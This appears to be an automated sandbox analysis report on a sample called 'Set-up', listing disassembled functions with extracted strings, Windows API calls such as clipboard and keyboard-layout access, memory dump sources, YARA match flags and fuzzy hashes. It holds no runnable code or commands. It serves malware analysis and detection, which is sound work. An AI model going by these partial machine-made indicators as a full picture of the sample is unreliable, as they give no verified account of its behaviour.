Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Global$Clipboard$AvailableFormat$LockUnlock$OpenSizeSleep
String ID:
API String ID: 1791062969-0
Opcode ID: 59d42a5ec5efa6a5c62f36621f3533bc865345ea7dd1ed8d5d546b08b91065c2
Instruction ID: 683e7df88f57c942e816f466d19843ac2155e10d65ed3439d8b8579359410cc5
Opcode Fuzzy Hash: 59d42a5ec5efa6a5c62f36621f3533bc865345ea7dd1ed8d5d546b08b91065c2
Instruction Fuzzy Hash: 36519F71A002059BCB14DBA8DC94BBEB7FAEF49714F14C51AF80AD7281DB35E941CB60

Function 029DEAC2 Relevance: 14.0, Strings: 11, Instructions: 224COMMON

Download Yara Rule

Strings

<, xrefs: 029DEBE1
cngj, xrefs: 029DEB81
r, xrefs: 029DEAE2
TPFR, xrefs: 029DEBC9
-,`f, xrefs: 029DEC5D
SQMP, xrefs: 029DEBA9
<0bb, xrefs: 029DEB71
h0Zv, xrefs: 029DEBA1
MQOH, xrefs: 029DEBB1
bcw", xrefs: 029DEB89
=`zo, xrefs: 029DEB79

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: -,`f$<$<0bb$=`zo$MQOH$SQMP$TPFR$bcw"$cngj$h0Zv$r
API String ID: 0-534936077
Opcode ID: e44040a4b2735c65299fc088213c7fada4f07abc1c84e62ae890a2810560b444
Instruction ID: 2bc26fb3c3473326faacc895629490554c8ee6dcc71363f22ec8696aae8bebc1
Opcode Fuzzy Hash: e44040a4b2735c65299fc088213c7fada4f07abc1c84e62ae890a2810560b444
Instruction Fuzzy Hash: 4851B4B050C3808FD3168F2985A176BFFE1AF93215F18899DE4D14B391D37A850ADB67

Function 029F0A92 Relevance: 12.7, Strings: 9, Instructions: 1420COMMON

Download Yara Rule

Strings

9:;;, xrefs: 029F0D32
ADD!, xrefs: 029F1603
MNOH, xrefs: 029F0CA3
yz{t, xrefs: 029F0C82
)*+$, xrefs: 029F0D06
p, xrefs: 029F1028
4, xrefs: 029F15B0
-670, xrefs: 029F0D3D
hi, xrefs: 029F1BAD

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: )*+$$-670$4$9:;;$ADD!$MNOH$hi$p$yz{t
API String ID: 0-965787625
Opcode ID: 997c608c473af798a2223841e5972ff65f8b077aacc1e5d445cec261a91a756e
Instruction ID: 065068ba77404dd5d7b5b7b22e3aff799c22bb1751504a7b15fe1d66ed7e16f0
Opcode Fuzzy Hash: 997c608c473af798a2223841e5972ff65f8b077aacc1e5d445cec261a91a756e
Instruction Fuzzy Hash: 50A20F71608381CBD774CF29C8907ABBBE6EFC2314F18892CE5C99B291DB758545CB92

Function 029F0A90 Relevance: 9.3, Strings: 7, Instructions: 592COMMON

Download Yara Rule

Strings

9:;;, xrefs: 029F0D32
MNOH, xrefs: 029F0CA3
yz{t, xrefs: 029F0C82
)*+$, xrefs: 029F0D06
p, xrefs: 029F1028
0, xrefs: 029F136B
-670, xrefs: 029F0D3D

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: )*+$$-670$0$9:;;$MNOH$p$yz{t
API String ID: 0-2815068004
Opcode ID: 4a64e37e82e3c1a77ac13423150078e1db639cee1c2e3cbc692a8c36cbb6a49d
Instruction ID: 37f9b83f833730e33c59994f1a3872f7224828c9befee0756a4283cd8ee42f91
Opcode Fuzzy Hash: 4a64e37e82e3c1a77ac13423150078e1db639cee1c2e3cbc692a8c36cbb6a49d
Instruction Fuzzy Hash: E82277B010C3C08ED7B5CF65C4947EBBBE5ABD2314F18896DE1C99B292C7798145CB92

Function 029E05C2 Relevance: 9.2, Strings: 7, Instructions: 445COMMON

Download Yara Rule

Strings

APWE, xrefs: 029E0A36, 029E09E0, 029E0A7A, 029E0AB5, 029E09D5, 029E0A6E, 029E09C1, 029E0AF1, 029E08B6
<?, xrefs: 029E0773
'O+M, xrefs: 029E0699
+sq, xrefs: 029E06A1
{+y, xrefs: 029E06B1
APWE, xrefs: 029E090E
8, xrefs: 029E05E0

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 'O+M$+sq$8$<?$APWE$APWE${+y
API String ID: 0-3708178263
Opcode ID: ea674c4bf2a87b14ee99e87b09ce17f5047985dd2b46c3ff27a97b7a549b3d73
Instruction ID: 2d221d504885a0092cfeb8eaac08bd7cf76681e0b1002425a64d515de7617453
Opcode Fuzzy Hash: ea674c4bf2a87b14ee99e87b09ce17f5047985dd2b46c3ff27a97b7a549b3d73
Instruction Fuzzy Hash: 08D1357164D3508BD711CF25D49036BBBE6ABE1704F1DC92CE4DA6B342D7B58906CB82

Function 00BE23E0 Relevance: 9.0, Strings: 7, Instructions: 254COMMON

Download Yara Rule

Strings

constant, xrefs: 00BE264A
_ENV, xrefs: 00BE25A3
global, xrefs: 00BE25CF
field, xrefs: 00BE25DC
method, xrefs: 00BE266C
upvalue, xrefs: 00BE2600, 00BE2614
local, xrefs: 00BE2545

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: _ENV$constant$field$global$local$method$upvalue
API String ID: 0-2491131414
Opcode ID: f9e8364ded9b39e538a49e351cc297dd0645aa4fbdd46c090bed4e8e53df68b3
Instruction ID: addfd0c95659725e85fcfd8d526e59b57392b6d1edb39abc497293b073f7ce7f
Opcode Fuzzy Hash: f9e8364ded9b39e538a49e351cc297dd0645aa4fbdd46c090bed4e8e53df68b3
Instruction Fuzzy Hash: 99812672B010849BCB18CF5AD4A15ADB7FAEF84324B2442F9DD1A9B381E731DD42C780

Function 00A85050 Relevance: 8.4, APIs: 5, Instructions: 918COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00A851BC

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d44b634f8452e2b74674286a20b458c44248eadac3cb6ad0179d14976ddedade
Instruction ID: c90a8b2aa048e046a9da33a839f31a898ae1564faec234929f1dbc458e3880c3
Opcode Fuzzy Hash: d44b634f8452e2b74674286a20b458c44248eadac3cb6ad0179d14976ddedade
Instruction Fuzzy Hash: 01729231E00A48DFCF15EFB8C990AEDBBB2BF49310F284569D856AB345D730A946DB50

Function 00AC0BE0 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1110COMMON

Download Yara Rule

Strings

%c%c %03X %03X, xrefs: 00AC15FB
%0X, xrefs: 00AC1615

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: %0X$%c%c %03X %03X
API String ID: 0-1975633477
Opcode ID: 0199cbf73e3476a6bba0ac761f3b3e2c8d9a0620c3bcb2e3e417a37a33dcfc95
Instruction ID: be92198d367b737d06c0666779883d169066fd444eda179c76573ffae111d6a5
Opcode Fuzzy Hash: 0199cbf73e3476a6bba0ac761f3b3e2c8d9a0620c3bcb2e3e417a37a33dcfc95
Instruction Fuzzy Hash: 49B2F574A00229CFDB64CF28C984FE9B7B1AF49304F1585EAD949AB352D731AE81CF50

Function 00BFDF75 Relevance: 7.7, APIs: 5, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF7D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A
_CxxThrowException.VCRUNTIME140(?,00C4E6BC), ref: 00BFEB61
_CxxThrowException.VCRUNTIME140(?,00C4E6F4), ref: 00BFEB7E
IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 00BFEB9D

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ExceptionThrow$FeaturePresentProcessor_callnewhmalloc
String ID:
API String ID: 3418196020-0
Opcode ID: 7ad8f742c782f3cc58a308ecfbfb38f29daf7722750c1528b6af6b8050b4ff19
Instruction ID: 8e60d966fed875361d07ec0eb0fde9526dd8cc4f704b883683291601e3b3cdd9
Opcode Fuzzy Hash: 7ad8f742c782f3cc58a308ecfbfb38f29daf7722750c1528b6af6b8050b4ff19
Instruction Fuzzy Hash: D9515F7190020D9BDB24CF99D885BBEBBF4FB44310F2485BAE525E72A0D7B4DA48CB51

Function 02A13A02 Relevance: 6.6, Strings: 5, Instructions: 341COMMON

Download Yara Rule

Strings

kuD, xrefs: 02A13C43
P, xrefs: 02A13B8C
KJML, xrefs: 02A13CD7
5mD, xrefs: 02A13D59
ouD, xrefs: 02A13C58

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 5mD$KJML$P$kuD$ouD
API String ID: 0-3954381155
Opcode ID: 9be44cefbd222005b209d4c4411aba23493655a4848a45c267e2c8baec023d32
Instruction ID: e27a136a7a6cab6e4fb4d1104b36678c6872b2f7f96ca154fa8c8b0adca1d076
Opcode Fuzzy Hash: 9be44cefbd222005b209d4c4411aba23493655a4848a45c267e2c8baec023d32
Instruction Fuzzy Hash: 56B103316083658FC715CF18889076FB7E2EBC5724F158A6CE9AA9B3D1CB719846CBC1

Function 00A645D0 Relevance: 6.3, APIs: 4, Instructions: 278COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A6465D
SelectObject.GDI32(?,?), ref: 00A64665
GetTextExtentExPointW.GDI32(?,?,?,?,00000000,?,00000000), ref: 00A64714

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ObjectSelect$ExtentPointText
String ID:
API String ID: 3450274596-0
Opcode ID: e0bb2264badb9adf6eae8faba9fc552015ca85e6bb47853749493465ce770b3a
Instruction ID: 0a97a15af9d88492aa061c50bdb6fbe519a6b95a1f4a4ef85edf31c23acf76c7
Opcode Fuzzy Hash: e0bb2264badb9adf6eae8faba9fc552015ca85e6bb47853749493465ce770b3a
Instruction Fuzzy Hash: 94B1AD75A041698FCF29DF18C898AAEBBB5FF48300F1141E9E40EA7250E730AE95DF51

Function 00BFEFA3 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00BFEFB5
GetCurrentThreadId.KERNEL32 ref: 00BFEFC4
GetCurrentProcessId.KERNEL32 ref: 00BFEFCD
QueryPerformanceCounter.KERNEL32(?), ref: 00BFEFDA

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 071e0dadfedeb8ef676e0fed8daf1f32dd4464d2f5231353e23de2df38343c6f
Instruction ID: cd0fffd8adf499859857dc14e58cf255c92bb5c787af4a45f8e9f13a35c8a78c
Opcode Fuzzy Hash: 071e0dadfedeb8ef676e0fed8daf1f32dd4464d2f5231353e23de2df38343c6f
Instruction Fuzzy Hash: 55F05F71C14209EBCB00DBF4DA49B9EBBF8EF18305F524495A412E7150E734AB04DB51

Function 02A13532 Relevance: 5.4, Strings: 4, Instructions: 352COMMON

Download Yara Rule

Strings

xr, xrefs: 02A1356A
pz, xrefs: 02A1355A
t, xrefs: 02A13572
|<, xrefs: 02A13562

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: pz$t$xr$|<
API String ID: 0-1407822990
Opcode ID: b2e4866ae2b1010d9c206b20ff9404bd9a6ecd3d3ea1e1d4e2c8e57421895b6a
Instruction ID: f2fba3b84dc1d7f97bb6573a1ec92855f1fd920927e77365a883a35821f71129
Opcode Fuzzy Hash: b2e4866ae2b1010d9c206b20ff9404bd9a6ecd3d3ea1e1d4e2c8e57421895b6a
Instruction Fuzzy Hash: 08A11572A083504BEB14DF69CC81B6BB7D5DFC4324F09497DE99983391EB79E8088792

Function 029DFA78 Relevance: 5.1, Strings: 4, Instructions: 128COMMON

Download Yara Rule

Strings

Jwi, xrefs: 029DFC1D
Jwi, xrefs: 029DFB3D
@A, xrefs: 029DFBCE
03, xrefs: 029DFB8A

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: Jwi$ Jwi$03$@A
API String ID: 0-631218979
Opcode ID: f004497ff748f9427ea0e41af61b4203306f1da8aef586faa826ad0e132aae13
Instruction ID: 48cc514c74359190b49e5e31f387dccd01095d8c70a061b8e06046b616b19b9d
Opcode Fuzzy Hash: f004497ff748f9427ea0e41af61b4203306f1da8aef586faa826ad0e132aae13
Instruction Fuzzy Hash: 1741E77029C3408BD3248F65985278BBFF5ABD6724F044E2DE5D5AB3C1D77880069F9A

Function 00A6D240 Relevance: 4.5, APIs: 3, Instructions: 39COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 00A6D252
GetLocaleInfoA.KERNEL32(?,00001004,?,0000000A), ref: 00A6D267
atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00A6D275

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: InfoKeyboardLayoutLocaleatol
String ID:
API String ID: 216616069-0
Opcode ID: 3445378b3c25f654385f4bf326eddfddfc17fc802a5d87a8e10249f5b77261c9
Instruction ID: 33bcc0a8c90093e8e3cc4d7cf04bbd34cf18d94232e7c34ef509b9cf31493267
Opcode Fuzzy Hash: 3445378b3c25f654385f4bf326eddfddfc17fc802a5d87a8e10249f5b77261c9
Instruction Fuzzy Hash: E3F06230A003089BDF10EBB49C56BBE73A8EB04715F410499FD07DB181DA64D918DA51

Function 029F3752 Relevance: 4.2, Strings: 3, Instructions: 468COMMON

Download Yara Rule

Strings

9qv0, xrefs: 029F3B4D
l, xrefs: 029F399C
x, xrefs: 029F3A7A

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 9qv0$l$x
API String ID: 0-139331711
Opcode ID: 05d819120e26dc6a8e5dc01cd09b95c134e92ee9cfe96d99f457a1f6376c6207
Instruction ID: 4fbde4ef08830a2190fad8b7bca3ccda48e57456318246b5a3ad20fae708a40c
Opcode Fuzzy Hash: 05d819120e26dc6a8e5dc01cd09b95c134e92ee9cfe96d99f457a1f6376c6207
Instruction Fuzzy Hash: 3FE10372A08380ABD3509F25DC41BAFBBE5EBD1310F08886CE98597380D679DC19DB93

Function 029FEA52 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

us, xrefs: 029FEA69
e7w, xrefs: 029FEAF2
mk, xrefs: 029FEBB4

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: e7w$mk$us
API String ID: 0-596661717
Opcode ID: 90cab4ac870081c3b081b7aea4100bec927f4a29ac8c56e8dc092ff8dffec4d4
Instruction ID: 4333408b8bfcd1fd0584661be6ca0bff2ee25184e983dca1410474da9f6e4a50
Opcode Fuzzy Hash: 90cab4ac870081c3b081b7aea4100bec927f4a29ac8c56e8dc092ff8dffec4d4
Instruction Fuzzy Hash: CB4198B0408380AFD750CF269881B1BBBA5FBD6790F601A1CF5E51B292D771C906CF8A

Function 00A71DD0 Relevance: 3.0, APIs: 2, Instructions: 31sleepclipboardCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 00A71DEF
OpenClipboard.USER32 ref: 00A71DF6

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ClipboardOpenSleep
String ID:
API String ID: 4107625934-0
Opcode ID: 0b58d5fa9265ac558809d438fa7f057cc68b153b181cfb44c23b8713f19e8114
Instruction ID: c1c8cf8bcf5e09ea5aac401608bae073152362c433b8ecee8c84071cf0481371
Opcode Fuzzy Hash: 0b58d5fa9265ac558809d438fa7f057cc68b153b181cfb44c23b8713f19e8114
Instruction Fuzzy Hash: C4E02633A0013043C6209ADDFCC4BEEA39CEBC9362B11802EE81AC31018652D90BD6E0

Function 02A131B2 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

KJML, xrefs: 02A13336
KJML, xrefs: 02A131E7

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: KJML$KJML
API String ID: 0-1613884386
Opcode ID: 78d47a0726b98ca59d22d5613aafd0696075c70137bd17aaef0a62e5ed0c91a5
Instruction ID: 9e82476a7d9c1d6dc0b3b22bd1686050ef5cb2d5c48da4248d23729bcbe47ecc
Opcode Fuzzy Hash: 78d47a0726b98ca59d22d5613aafd0696075c70137bd17aaef0a62e5ed0c91a5
Instruction Fuzzy Hash: 9E91F6356083405BEB28DF28CC91FBBB3D5EB95324F1488ACE59987281EF349501CB56

Function 029F9444 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

WW, xrefs: 029F95CF
#T, xrefs: 029F95D6

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: #T$WW
API String ID: 0-101372553
Opcode ID: 88f5084330cc64eed70a7cdc2c82ada39ae9241c0fc2674cbd227c97e90a2824
Instruction ID: 1d6cab2caf3ded9c2d3bfe9e12327967bb29faa97fd2ae4bb848f36a6266d927
Opcode Fuzzy Hash: 88f5084330cc64eed70a7cdc2c82ada39ae9241c0fc2674cbd227c97e90a2824
Instruction Fuzzy Hash: 5B515FB4D40354AFEB20AF79CA467997E34AB06310F24819DE5986F286C739850BCFD3

Function 029E2407 Relevance: 2.6, Strings: 2, Instructions: 134COMMON

Download Yara Rule

Strings

89, xrefs: 029E2457
LKJi, xrefs: 029E2586

Memory Dump Source

Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd

Yara matches

Similarity

API ID:
String ID: 89$LKJi
API String ID: 0-2183204925
Opcode ID: 1ce7aeea86d95e81e9ea2b88f6bc55537f68257eaa4bf64c2722177d91bdb4d7
Instruction ID: 63091f78e9b8b53d034e64ad5f972a6af0532624689e47ad35987bdeb40be1b4
Opcode Fuzzy Hash: 1ce7aeea86d95e81e9ea2b88f6bc55537f68257eaa4bf64c2722177d91bdb4d7
Instruction Fuzzy Hash: FE4176369083918BC714CF19CC9162BB7E2FFD5354F19899CE8C99B390DB388906CB4A

Function 00A89460 Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

4, xrefs: 00A89BB8

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
